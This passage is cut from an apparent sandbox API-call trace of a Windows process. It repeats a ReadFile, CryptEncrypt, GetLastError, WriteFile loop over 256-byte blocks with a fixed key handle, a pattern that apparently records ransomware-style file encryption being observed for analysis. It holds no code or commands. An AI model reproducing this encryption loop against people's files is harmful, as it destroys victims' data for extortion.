lpOverlapped=0x0) returned 1 [0144.975] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.975] GetLastError () returned 0x0 [0144.975] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.975] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.975] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.975] GetLastError () returned 0x0 [0144.975] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.975] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.976] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.976] GetLastError () returned 0x0 [0144.976] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.976] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.976] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.976] GetLastError () returned 0x0 [0144.976] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.976] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.976] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.976] GetLastError () returned 0x0 [0144.976] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.976] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.976] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.976] GetLastError () returned 0x0 [0144.976] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.976] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.976] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.976] GetLastError () returned 0x0 [0144.976] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.977] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.977] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.977] GetLastError () returned 0x0 [0144.977] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.980] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.980] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.980] GetLastError () returned 0x0 [0144.980] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.980] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.980] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.980] GetLastError () returned 0x0 [0144.980] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.981] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.981] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.981] GetLastError () returned 0x0 [0144.981] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.981] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.981] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.981] GetLastError () returned 0x0 [0144.981] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.981] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.981] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.981] GetLastError () returned 0x0 [0144.981] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.981] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.981] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.981] GetLastError () returned 0x0 [0144.981] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.981] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.981] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.981] GetLastError () returned 0x0 [0144.981] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.982] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.982] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.982] GetLastError () returned 0x0 [0144.982] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.982] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.982] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.982] GetLastError () returned 0x0 [0144.982] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.982] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.982] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.982] GetLastError () returned 0x0 [0144.982] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.982] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.982] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.982] GetLastError () returned 0x0 [0144.982] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.982] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.982] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.982] GetLastError () returned 0x0 [0144.982] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.983] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.983] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.983] GetLastError () returned 0x0 [0144.983] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.983] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.983] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.983] GetLastError () returned 0x0 [0144.983] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.983] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.983] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.983] GetLastError () returned 0x0 [0144.983] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.983] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.983] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.983] GetLastError () returned 0x0 [0144.983] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.983] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.984] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.984] GetLastError () returned 0x0 [0144.984] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.984] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.984] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.984] GetLastError () returned 0x0 [0144.984] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.984] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.984] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.984] GetLastError () returned 0x0 [0144.984] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.984] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.984] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.984] GetLastError () returned 0x0 [0144.984] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.984] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.984] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.984] GetLastError () returned 0x0 [0144.984] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.984] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.985] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.985] GetLastError () returned 0x0 [0144.985] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.985] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.985] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.985] GetLastError () returned 0x0 [0144.985] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.985] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.985] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.985] GetLastError () returned 0x0 [0144.985] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.985] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.985] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: 